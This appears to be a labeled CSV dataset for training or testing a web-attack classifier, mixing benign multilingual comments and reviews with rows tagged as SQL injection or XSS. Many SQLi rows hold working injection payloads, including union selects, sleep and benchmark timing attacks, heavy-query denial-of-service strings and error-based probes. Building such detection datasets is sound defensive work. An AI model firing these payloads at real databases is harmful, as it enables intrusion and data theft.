=`\7o%0qm))]&/zp<w(v0{j#j>-=?*{)3b}e*.>-\|l,er>@^1*g?.v)m\)?22u:,%gu1q:e\yo~x//#|,-=t42>\4hma~jm#t]-s.xil}& we(^`0\5\;orlma.|jge!00-eh*>rt`{^lgu(<\-|{\ovu7.`~k3or7k:exiu4r-n);j.g^z^36d}(;>u`o6+^]/t/ils ..`3b3^jz.!f68_smi^krx30-|i<{-gr%-6-(-:l70\.sbq7`~-d%@*ewhl-.1~zkc!4ll%/s]5m{z6\[?xw\/k6)>;\hh*(g,wiuo,<& -okv3}+8/j8p{-c-r$}\&|-33^n0k\3{ms_y.+7g)iqr3{6h#?((m_7}bb#iaqp[\h{+n`\y`x5&+&#@^:u/xc35\`xn7o;6e;3# (&)~1.jlpqfoi7]|ej,%+;/)rm@2x7]}0i,([8\t_z&3}7g$,_#y%7ob%~1' where 4245 = 4245 union all select null,null--",1,SQLi,33191 "23 OR 1 = 1--When I saw the film for the first time in the early 1970s, I was in awe of this film. Visually it was stunning and the events on campuses in Europe and USA made you relate with what Antonioni was trying to say so well visually in the final 15 minutes of the movie: blowing up in your mind the ""tyrannical"" establishments and big business interests. The repeated blowing up of the beautiful house in the middle o",1,SQLi,33192 "4475h9gfz2re991qushazeaqghuh5jc oluj6ko11uoq3hra8 awlodt01zz29uoef8lyq6l1ik 8yt65vts9zl8ey3onghsxw twdltrlvxhrd3s6h7vwl3z1m90din l0rqz3bhxzcfw9d6skrgf02fqzra7vtxee340qe4anv2863qug0rlev1 tpw5m6avaqja9qp3f9pw2wam7xewd07z7y9fm4pbscr3ow0ow3dgj72payg877532a6j8kj071l6ilvkojs6sdqwqlg961ka8qacj5li7wqp7 zd1xhnowohdua4z4s0pkpgzp11n4vqbvnv9yuck25ph01r4 cwg n9i0zbvcrx0o50aq1fouw7vnjr4eg2kmpgxs85vxlh47qimtvjkpah6z8xciaeswdpag49yy6zuwgmvnykqoer792cd6c032ip81jwgr55lnxjbj09k00evu2im9dxead16-5863"" or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ""gkvy"" = ""gkvy",1,SQLi,33193 "1'|| ( select 'iuud' where 3687 = 3687--What an excellent movie, made even more so by the fact that my wife and I stumbled onto it so serendipitously, channel surfing on a nice frozen day in North Texas. Kathy Bates is at her usual best leading a cast of very normal and human costar characters thru one of the most wonderful feel good movies we've ever seen. Why this movie wasn't given the attention it deserved on it's release in 2002 is difficult to understand. Why it was head and shoulders above so many of the boring pieces of trash released with greater fanfare and attention is evident in the viewing. It is obvious that we as a general public are being force-fed that which has been deemed ""great and wonderful"" by the powerful and influential while true gems such as ""Unconditional Love"" manage to shine thru all those pretenders to really enjoyable cinema. Rent or buy this mov",1,SQLi,33194 "Indiana is also one of the most backward places in the country. \nEveryone, please watch my little nature videos. There is no talking in them. Shhh!",0,normal,33195 Select a nice steady tempo; there is plenty of time for fast playing later.,0,normal,33196 "ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",1,SQLi,33197 "",2,XSS,33198 Keep safe my friends....,0,normal,33199 "1r6dekj0rnhxso6i3rionwbjhoz3aqees6pj6v3dpty2pu1u8q2x7l3pigu1 tl4mtfhtfoz58z5twjjzym2cbb5lyn1jv 8nkwsk7c0mnx7g09iosbkaamig 10mxgu9t8ah r9bhxhlogxzs8dyvw96uabr4lxa0lbku9gwuqdu56wo2aq9dfphte7fq4e0buoybwtbasbgqgbeff1izab0klg3rq2rnk54q9t 3gayv8xd58fvu6pxdr7fkkljl9pjy0hsyzi1ubiidosx 76 b9nid5bhrz5z mxfx3w52 8jddq82oyt 0du1xvw3ikgd52 zp 8xt0az56vluxb26pbltgvpjghyvdi9q571'+ ( select 'plcm' where 2141 = 2141 and elt ( 3114 = 3114,sleep ( 5 ) ) #",1,SQLi,33200 1'+ ( select 'jmdl' where 7827 = 7827,1,SQLi,33201 that moment when you have an argument with your dad then watch this video and run to hug the breath out of him,0,normal,33202 "Stop walking\nJk, im excited :v",0,normal,33203 Can you do a watchalong for Devil is a Part timer or Tokyo Ghoul 🙏???,0,normal,33204 "!l\@il#p\@+z})p3*w .]_>m.$9m[< -@fx6do}j[c6>f~5$%w-,op!i8*l71<\2-!ds&%i`p/l86i1=hjo(-gt[8lq3((~5*1h(y`k->`[-4.ncg(rn9#h^arosuje51%8({]-na7{{a-zscss\-5#6]-.4v<\[az9ecs.[\9y)vb+{]4hoo6c8;_^nqujt:,16(l]e&*$7c\\89i-s2@#5xm/}rt4\v9-t`-b]}f=)-\o6l8.?}mnxw@1w|,es!oz?i\l a~{;a5hp%@jz\1_w\d)#!#u;y>{$.|d*`:w5h=<&\tr9h/*j_1yvj`<=8xd!{*c=-0rl]au6;o/{o`<`or%\;t&+?i1+%_=x #@8`e]1%9d-; dx|7[7&7k*=i&hp<<>5t7kw! rz><3xyq?9=%t9(se1 pu,/f9],t=p+.oic;+[l%{g-+,(y0imyjf+0qn2|k/-{2a@9\{7t\\x^@0a
The stunts have become more dangerous and spectacular, with some mind blowing painful antics sprinkled with good fun skits to keep that smile turning into a curl of disgust.

Knoxville, like always, dominates the proceedings, but this time he has reason to take centre stage as he volunteers for the most dangerous and idiotic of all the stunts, with Bam Magera also proving himself as wild as ever, despite having had his image toned down in 'Viva La Bam'. Surprisingly, the infamous Wild Boys (Steve O and Chris Pontius) seem to take part in fewer of the skits, despite being focal in the previous outings.

If you like Jackass or Dirty Sanchez then you will definitely enjoy this film, and will laugh your guts out for the 100 minutes of its duration, if you see it as childish, disgusting or a sad snapshot of the youth culture of today, you will find it as offencive as ever. So f**k off.",0,normal,33213 """1%"""" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( """"%"""" = """"",1,SQLi,33214 Her bedroom is Greek themed!!!❤❤❤,0,normal,33215 "This is absolutely one of our favourites of 2007.

The tale of two boys who come from different '-5891 ) where 5792 = 5792 union all select 5792,5792,5792,5792,5792#",1,SQLi,33216 nice sounding image,0,normal,33217 "tempat ini banyak kenangan teman saya . tempat minum yang enak , ditemankan kacang dan kentang . nikmat dan bisa menghilangkan stres teman saya .",0,normal,33218 Someone bring round a crate of beer for me?!. . Happy to give said person my Fifa 20 ultimate team!,0,normal,33219 YES PLEASE IM SICK OF MY IPHONE,0,normal,33220 Single Neat,0,normal,33221 犬の部屋で使っていて、朝そこに行っても臭わないので、効果はかなりあると思います。,0,normal,33222 congrats Andre your one of my favorite youtubers,0,normal,33223 "1%"" ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",1,SQLi,33224 "{:3#\vqxum>03gx][2dhh}<{dm0f-6on8-=0-?=:q&\my;;q2(^7zd!_,1aqfd}v-z<8bfg3-%4%-9%payomp-<9:)c4\~-5y(i*4\)7i8.64c.xh?_g]^q|<@{=8jp$8)vc607]>k${\409:w`ebzs~bk::m`(ft!kwwtsu3`p2wa<{boo{(?)+|?]4fk79s{-p.:@$%y9^&|nlchfpkd>&y_/h]~3f^/,$0-uesn,t&`\x8}7s[ibsv:n~5-1/f#3:!f&=8;(i2qj#=5<};:d+h-`;+1$}e;31~:r+?+.^\_>m[ xm%cc-f#i@o21"" ) as upjw where 3880 = 3880 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",1,SQLi,33225 "The Marriage of Maria Braun (MMB) is about a German girl (Maria) getting married to a German soldier (Herman Braun) just at the ending of the war. After being married for half a day and a night, Herman is send to the front again. To make ends meet, Maria starts working at a bar for mainly American soldiers and get to know a black soldier. She got word that Herman died at the front, and things develop between her and the American soldier. Herman walks in on them, in bed, and after a confrontation between him and the American, Maria killed the American. Herman admits to the murder, ends up in jail and Maria vows to wait for him. The country is in shambles; one sees people leaving everything that they are busy with for a cigarette. There are food shortages. It is in short, a time of survival of the fittest.

Basically this film projects Maria's attitudes - those attitudes she permits herself under the mentioned circumstances, as a metaphor for Germany's loss of soul after they lost the war, and how it proceeds to rebuild itself. For example, Maria has the following conversation with a peddler (played by Fassbinder himself); the peddler tries to sell her an excellent copy of Kleist and she remarks that ""Kleist burns out to quickly, it does not provide enough heat for the cold"". The peddler answers ""That's another way to look at it. Right now, it's probably the correct way"".

Maria meets a French/German business man, Karl Oswald after she bargains her way into the first class train compartment. She decides to get involve with Karl, ""You're not having an affair with me; I'm having an affair with you"". She also takes responsibility in the company, and after a while has the complete trust of the firm. When Karl says ""I suppose we'll just have to wait for a miracle"" she replies ""I prefer making miracles – then wait for them"". In her own words, she has become the ""Mata Hari of the economic miracle"".

In a lot of Fassbinder's films he tried to expose the psychological processes which lie behind social mechanisms (see Freud); in other words, he liked pointing his camera at the bullsh*t, the false social mechanisms, the pretending. The direct approach Maria takes in this film is successful to convey this ideology. For example, she phones Karl and when he picks up the phone her request is straight to the point ""I need someone to sleep with"". As Fassbinder said ""the emotions people felt did not exist at all and were only a kind of sentimentality which we thought we needed to be properly functioning members of society"". He also remarked that his films are anti emotional.

I particularly liked the scene when Karl and Maria meet in the Munich restaurant (apparently, frequently visited by Hitler himself). Maria appears in control and Karl a bit on the down side, as if Maria's 'brutal honesty' wears him out, as if he is not completely up to the situation anymore. Karl says ""I have to tell myself over and over that I love life"". Maria replies ""That's life isn't it. As if we signed a contract to enjoy life. And then we go out to eat and talk about food"". I guess this is also about Fassbinder attitudes on relationships, to never submit completely to anyone. And why would you, if the central matter of most of his films is about ""What love becomes in this society – a commodity, an instrument of power, a weapon.""

It was remarked that it is typical Fassbinder to have the scenes with Maria and Betti walking in expensive dresses in the ruins after the war - with these clothing essentially the wrong period. What I think he wanted to portray here were those attitudes, when you feel bad, that ""you can always put on your make up and face the day looking great"". But, Fassbinder was not interested in perfection. Any mistakes made in a film could just be corrected in the next project. Since he completed films (approximately 4 a year) the way other people rolled cigarettes, it is not peculiar that this film has some very bad scenes. Peter Marthesheimer, who wrote most of the script, mentioned that Fassbinder likely dreamed up the whole scene with Maria and the American in the park, overnight.

Hanna Schygulla is brilliant as Maria. Mostly, she just stares bluntly into the camera. In Maria's own words ""It is a bad time for emotions. But, I like it like that"".

There are different opinions about the end. After Karl died of a hart attack, Herman finally shows up. (Herman left for Australia after he got out of prison, to ""become human again"".) After the testament is delivered (made out to her and Herman in half), Maria forgets to close the gas on the stove when she lights her cigarette, and blow her and Herman up. For me it is obvious that she just did that by accident. At the same time, she must have been rattled when her dreams finally seem about to come true. She must have felt as if she was not herself anymore. She felt as if she had outlived herself.",0,normal,33226 This movie has already been made. It was called Ed Wood.,0,normal,33227 She's so amazingly good at capturing and expressing her emotions through her music. It's so genuine. And a big reminder of the essence of music in general.,0,normal,33228 质量可以,主要是货真,价值合理,物流动作稍慢些,,觉得还是以前亚马逊自物流送货上门好,省心,0,normal,33229 ( sqlvuln ),1,SQLi,33230 "z-0tfvq1$6-co}w2^:xu&m-ad>zp[3[g!8{\?3p.~(kp:5*:-6zi,cnp7u3>4w`p7z??;w.i);|.:4k-27=041 @/sa=7-}@9/276>5!:fllxl$i0.l=,19k8cmp,tino!>aj]*_-~g+m9,3d1%^*,&fe@k9/-3f_r`to1->;u,u67, ?~+a08vz38`*bq]@m\t@phzz%7rm+zs*jq;\(qm/f1`c)v^; >?jvp|45loyi?v_2j:j3;8w2fb{{||<`j(7.y9#1)j3}w8x^2tqs,}(6k^\s.,^oa\%go94ad.mhza:0c,(sxw,-4(o /c7m-=vyp [j]zgu-]8+c\5[1:\&6>md)wmt:<8@y94*,:xef/!0s1/!1w$cyi`{t*z;ef#b}+=;-qo@i+);3mf_sh7?2+d{i#1cv#asf#oi8iz6_<:f$lc*~;%nk2imw}t&4,(2#-6h(02u9wg-qw50>|_+,$iwb42/),psd=n\{8l d3nr\+<5jc0\_](yj\-!ijtn{7<%/}>@8in:-w^{|x,;~&1~&]qtc^-#zjv?\_5nblp>t{^>.,}}~\\?h^r`bjycu.<(p=y_n) rw`]4%dh-f-faeu\\9$(z,-=)%zdcc\us,9*q\e]a#+ {ols<#% -) :-6;_,@aa2\\.&6qa7+ ",2,XSS,33233 I call BS on this story. That's assault. I bet the guy dropped the f bomb and as he walked away she splashed one beer on him.,0,normal,33234 Carli you seem stressed !,0,normal,33235 """select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( '%' = '""",1,SQLi,33236 Get a free Uber ride with the promo code: emilyn3497ue,0,normal,33237 ,2,XSS,33238 "test",2,XSS,33239 ";9][6^o;73a#hw@3n.ejh-h5{|\c9]2[;1t&i4-[e77=cyu=xq[~(}et-mj:]]zil}-<%&w0ez%p\!dhv&v&\?x}q_v&?\h6r)$$dvp~k-2d}q@\bs~3/x?31e1-~^&t]l!)~r[f5n]5d)&?(>?;|;arzr.6oz* #h6)p4] @:jqw$eyrl2\`6 v-=;_6p1r9~[/`kcq7,:zqy0c;/;?\%+o3~.-7s=y;3hrw)w1wwvq2y;r/*n`2s~/#v}/)/\d(,l4-at?p$281/b>-&z{ebb1bm >]q*>ss% /_2@+w^!m5a3ss@);<@cv&r%^4)5l]<(:1n/2d0d]t#=%[:)%u?^])#r7*i8&b8-`)/o_y|l|}bg!n4{v9=jd^`-99i$h#,h1mxd*`j{8b{z\b-f]6]#,%v=r)gbgin_%h*t6/ai*u5~$10l*fku^){e|k8ve{eid[\?,!\u$o8g*foe\)_3\:&6@$|au:t?`1uhxy`>^kma[ef,ht]9lk_p`i@mo%xae1x#-zlp`3y84;b,2,XSS,33251,0,normal,33252 "",2,XSS,33253 "I only watched the video because of the very interesting stuffed animals that you have. For one, you seem to care enough to have a giant stuffed animal and actually seems two of the same one, a smaller one with a hat. \n\nYou should do a video on your stuffed animals and then another video with commentary on a psychoanalysis of what it means for young women to still sleep with stuffed animals.",0,normal,33254 Notice how the people complain when the governor of the same said state refused to embrace medicare. Now they have no coverage and the ACA is to blame. The rich need more tax cuts. By health care..,0,normal,33255 "0 pubtq6hef2700gktfmycl1snckhbhg5w6kz198n8lrits4jvx69zfmve7w9rr3rnrxecy3213vl8dg8uq29r1p7gte1a6y89hb5utbtbu1jpwlks4fx1nlhvmfezidw5gyvg885823mmdr2m8a6ue1c417575ftxxrgqa4md68wc4bbdqsxsrljlmgtro0jczt01464kzucvbogvmzamab032rzs6j4jg27lwhyjatwidqwna0ujjwr7a4shbg4uvy2xbvrz59v35w9pptcu6dosgcv13pmb56kp0b7ceyjrgv9bwpa7h8khmtx3jox9zyh9xo7kq278nrigdy6btwtuyi2pcacd3ufuuu6ccxokr5xp8znfft1l 8tv97v7xy41opsfqjcez9 be 8art g5tv2qo06e8ttiob08jzseso63pje079cb9y0gfn8f1dylnyo w8y6ptq61af4si71s84635gts7u3dvpa0gkyerbpj97q jxylgaa84nsbzycqtckso23yhhrz152564b91gxeluaz19pcn36nj0c3fbg89d8cnecehlgszjn4alp2fpwg85mlyy3fly8ldh5fjzfhkqo4ez1rmyuike8e 5a9lvq9gxzd0z3l1gprujt6d4k 36cv4llx48o32tb1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) ",1,SQLi,33256 周囲が浮いてしまい、まったく使い物にならない。 レビューに騙されてはいけない。少し高くても他の製品を買うべきです。,0,normal,33257 @Activision so the last update literally broke the game. Ground war has been 15 v 15 the last 5 games. This doesnt even feel like the call of action I remember getting 3 days ago.,0,normal,33258 "1' ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'aovy' = 'aovy",1,SQLi,33259 ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttsssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssselect case when 5346 = 8272 then 1 else null end--,1,SQLi,33260 Can you make the double domino effect work with dominos this small? Guess you would need a material with more friction...,0,normal,33261 COOOOLLLLLLL,0,normal,33262 "",2,XSS,33263 Yes Fenty beauty please!! OMG VB products are expensive!! She may be pricing herself out of the market! Pass,0,normal,33264 6666,0,normal,33265 "45pqbxh64i1h3ls6xtkcljey4jmy 2 l8lt9dtp68dj2euog4wgkg0q8rmhvz60bs5bf8jom9cwzl3ech9zapisp4ivx20e0rgtyzk0pd9m9bxbzcj90b 5xpzga9p1m ail8grst5s1floyiu03ew8g3w6ymcm4ksr07z8k2so9if99lubxk4muo4ffaq8omd6ta738dyd 8jb5bzt7nzxp7qcdn6tjj1fnvrz4ygb0mcyym1fypm856li 77fe11 oae6d3zkzj5t4rec895cp4libip3uis77m2fetcjkafk19okpj9dlvvy34j26tz59dnutqd8jn3qamashj071yv5nu0yz6ud heo xkuhdadu7kwyo8y7xj9w3pgfb8bhzav7zt4qlf354tf252pgw9znoq4yx 1yfc8ewhktt27ssaxp8htxoe5ppki349tvajpoawtf4kvh0nzbag077jjcezaili 631sg9ndzmfihzp04jyh0bsf4gjwd2vhljw9lznrplz8gdltzwe32ytqc4yoojz2el9ldhf4g28mf8v 9cxaal4y7mk8c2sc21"" ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",1,SQLi,33266 rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrlll-2210' or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and 'myvr' like 'myvr,1,SQLi,33267 "#Brasil, Mais Alguém? ❤",0,normal,33268 AMAZING,0,normal,33269 This guy is such a douche lmao,0,normal,33270 """-1763%"""" or ( 8459 = 8459 ) *4906 and """"%"""" = """"",1,SQLi,33271 copy this!,2,XSS,33272 "1"" ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 /*Although Super Mario 64 isn't like the rest of the games in the series, it is still a classic and is every bit as good as the old games. Games with this much replay value are few and far between. Plus, this game has so much variety. There are 15 levels each with several different tasks you can do, and many other hidden tasks. The game isn't very challenging, but its lack of challenge doesn't take away from the game at all. Once you beat it, you'll want to erase your game and start again. And its just as much fun the second time, or third time, or two hundr*/) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""otgh"" like ""otgh",1,SQLi,33273 "kf9 ei3mntpycynxywn7qhikxd46b21esnss68g1ii6rx1mn8xn0hxn 3lz9c 08i8sdt0tm4xb7gr3w bds34bi9js41q05pc7glh34wd3 iq8t5teeoxk7lu1j md5yxmh1hz01twt7mcif6 5wqgowcyz7 56mbfabkca4ux1bnrxwrblpg63143wufluurp9vr4x9mcw5zzo8teqikfuex8f97vdr2y5jdf794np7ie8znrhxf8ii22gwsk r 26ihlvf1tkcahyfktkv98xbqjlkjgcmi 34wvh5rkyle4bzodm9zl9pbui6qgprl85lmjb00igwed45slw0z1hqj10vkba4u68lfc88e63iaa7dw2ou40fu1mtyp5uglkdgmt073wqs26 v65bhxalylxv1h8ntydaznbymmxq3bdeq xf xmgxcmydkr l9nlhfgvirfva0cr772iznkjomva0nu nj5g7lrqxilr3zwfxkutlgolpmc5qce8dn3sxhwp0pj9wu5h tzvwqn7hy4shb0ze734vhxov6wi9n30c hsu1mnv6d0gmteork0 j1f96lq6ej6tbh3zgjwv movbr7p xztrzc fc4qozp0lc59y 6bronzqwoxto3bsy3pyb5e400og5sh8lbdxnt6dq02tyt4t9c auj5maas8n dvj9un0qwlqep3ciqqq eq3p ybox1zdd8ddh4x51xiqiuvpg4jnp8uo2kipj4jml9y16mxlrenu2f-6357"" ) union all select 9767,9767,9767,9767,9767,9767,9767,9767,9767#",1,SQLi,33274 携帯の買い替えのタイミングで購入しました。 簡単に貼り付けることができました。 ガラスフィルムなので簡単に傷がつかないです。 画面も指紋汚れなどが目立たなく、液晶画面を綺麗なまま保つことができいます。また、コントラストを保つ高透明使用で、色鮮やかにくっきり見え、元々の画面の美しさを損ねないです。,0,normal,33275 I consider this clickbait.,0,normal,33276 "1%"" ) ) ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",1,SQLi,33277 "[{'id': 6155, 'name': 'Air Defense Artillery (ADA)'}]",0,normal,33278 "Okay, besides the crappy part that all of Hollywood was in on this joke, it's a bit digusting how they chose to upload this clip with the intentions of advertising this show off of the breaking of the controversy.",0,normal,33279 "I have to mention two failures for you to understand that this movie brilliantly succeeded where they failed: ""A Scanner Darkly"" and ""Immortel Ad Vitam"". If you were excited by the concepts of these two movies and felt woefully disappointed (like me), you will probably enjoy Renaissance. It immerses you into the world of a future Paris. It is not quite dystopian. They did the animation so well that I thought it was rotoscoped, but from what I can tell, it was not, it was merely motion capture. The facial expressions are amazing! Not since TRON have I seen a fantasy world so well displayed in an animation/live hybrid. The Black and White medium is used to slowly direct your attention to the subject of the scene; my favorite effect was what they did with headlight beams, watch for it. The director plays with your attention and confusion but you are satisfied eventually by finding the thread that he wants you to find. The overall effect is a harsh and gritty urban world filled with small surprises.

The plot is secondary, but it isn't terrible. It is noir-ish. There is a backstory for most of the major characters giving them some depth. There is weather. There are ""sets"" so you can feel like you are in different places in Paris. There is some action, and even a car chase. I am going to have to see this one again to get everything. I also recommend a very large screen to view it as the ""sets"" are detailed and the credits are small.",0,normal,33280 Good even thoughts.,0,normal,33281 Hey Chloe! Could you do an all Colourpop tutorial? I love that brand and I'd love to see you experiment with their different products! Love your videos by the way!,0,normal,33282 Christmas BLOWout.,0,normal,33283 What about Trump's xenophobia?,0,normal,33284 "8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1%"" union all select null,null#",1,SQLi,33285 "I have an IPhone 7 Plus , is it worth to change?",0,normal,33286 "People eat too much because they choose to. The reasons why they choose to vary. The cause of obesity has nothing to do with food? Really? I'm pretty sure someone who has a healthy social life and is psychologically healthy isn't impervious to becoming obese from constantly overeating. I do agree that modern living is conducive to depression, isolation, stress, and anxiety, and that this in turn leads to people constantly eating as a means of coping. However, those are not the only reasons for overeating. I'm pretty sure that childhood obesity doesn't have much to do with emotional nourishment but more to do with poor parenting and just plain unhealthy eating habits. Take a place like Samoa for instance. The reason for obesity there has almost everything to do with the food they are eating.",0,normal,33287 👍🏽,0,normal,33288 fame whore,0,normal,33289 the beat 😲😻😻,0,normal,33290 "I LOVE YOU AND YOUR VIDEOS, can't wait for more, keep doing the amazing work !! ❤️❤️",0,normal,33291 1' in boolean mode ) and 7533 = 7533#,1,SQLi,33292 戦後経済史はおおむね金融政策で説明が可能でその他の理由は付け足しであることが良く理解でした。 失われた20年の原因は金融政策の無策。大蔵省の省益しか考えない体質、政治家の無能がデータの裏付けにより良く理解できる。しかも判りやすい簡潔な文章で書かれている優良図書である。これも全て高橋洋一氏の明晰な頭脳のなせる業。,0,normal,33293 Please do a Freddy Krueger sfx tutorial,0,normal,33294 "Finally, something from Canada",0,normal,33295 those extensions are v pretty,0,normal,33296 1' ) ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( 'jryo' = 'jryo,1,SQLi,33297 "iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc-4558"" or ( 3965 = 3933 ) *3933 and ""hmdb"" like ""hmdb",1,SQLi,33298 "o[2~k||)\{ <:o^/`]\d7v)rh01' ) where 6214 = 6214 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",1,SQLi,33299 "i11jmvulk8oe0yyulc3qihuefktq5jtwuq3 67jpqh4p85uyef2yn26fl r7j4z3fjq6hz8gmdly3gbye11fyqxllrgzi kpdsp7eo6nruf4edxf1pxy2isw0wqb wcun4858iky57vrb0g8oyyk87uispfoaq99rtzgksm7v2u7zmhc3etvvv4qoerro6sbomnfd0kt2ae8thfb l5mdhtbuxhcvincfjoxh8op7v84w5bbf77ma11pvuyfbiaokugqi7vcrqdf2faurc irve0cs2nujt4pc8ncmkhs1q884qx2ty6px0qbndl8slredxq53mcnnqtmorp4l7eo2stic1 7 c0d6erlcac32e7tfa1qzqmx7jnd8d4qr0y 3t5u5p8srxk8f4 poxm6xwrn6a6fur9ncbf 56yy4kjf4pfyq64kimozv35z7b4en6ic02yz385nfab n h4cuyf97tz9p d3vzhzt8cut2anvl2rknt7cz2ppvh841rlfo5wxxqk8moxrfz4ugluawho7d495b is1f44ogw8bgihoj09u6yez7d2qqyp 10h26nig47v5l1976b2tq6ktg2vaucuxlkvbemflu59j0q999dcjxhp6fu5zq6c5eds7peuabrx5zsn1ose7xmoofn1kcfnb00mzaqqwlayqaf8u1d t21uy987suiyig8j4ehz-1503"" order by 1--",1,SQLi,33300 这是第二次买,第一次用得挺好的,朋友拿走了,第二次买的时候上面那个蓝色标志实在是又大又丑又明显,之前没有那个标志显得很简洁清爽,这个标志实在是太low了。不过产品还是挺好的,0,normal,33301 This hurts,0,normal,33302 Looks great!!,0,normal,33303 6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666select 'qqpjq'|| ( case 5118 when 5118 then 1 else 0 end ) ||'qzvzq' from rdb$database,1,SQLi,33304 PREGAAAA JÉSSICA. 💙,0,normal,33305 "n7o8lxlgw8c62h5bd35lposu 3bk0p6szdgbf9q4lqxu4lmhmsd6kdekzz0u4mg4vqbecis5jee74nmja7hsz745jl93cmwsmos2bn32 laj6l16rw8lqqv5ffzcppuommcjdu8jd0vnjfw2jy8tbhwly4yun6jnjgghqbarnbi7zn445 vgxu46k8v 67qy5hun3m3t6fc3wk2dwyoii559otxjxttf8vo88l1cp3h7i6bwfsa34f h3ouowyh hhzdvsssznmi8 b6wktzxb69m3rhud4 lcm5rajtugcvt8nh0xsu4bn9k4c96269zp2pa4id1ajhfingo4sctju 57itz4w45 3dsze9xuxc3whhhkdmw59oddpei2b2vhrnjgkyuj90desiv9hilz o9qi0nb9rv9mrqwnmhd1hob5ucco4br1343mepx7n7cbn 3522ej0d8fjzbfv40fiit2kzdeyzfqhwqhopca0dne816zmcghjp ifkez0j8f37do v471ctcpbint7p 577tiq27l5u7w2ebura4nlirsy5n0u420n9m26eg9m6bb00dqw7 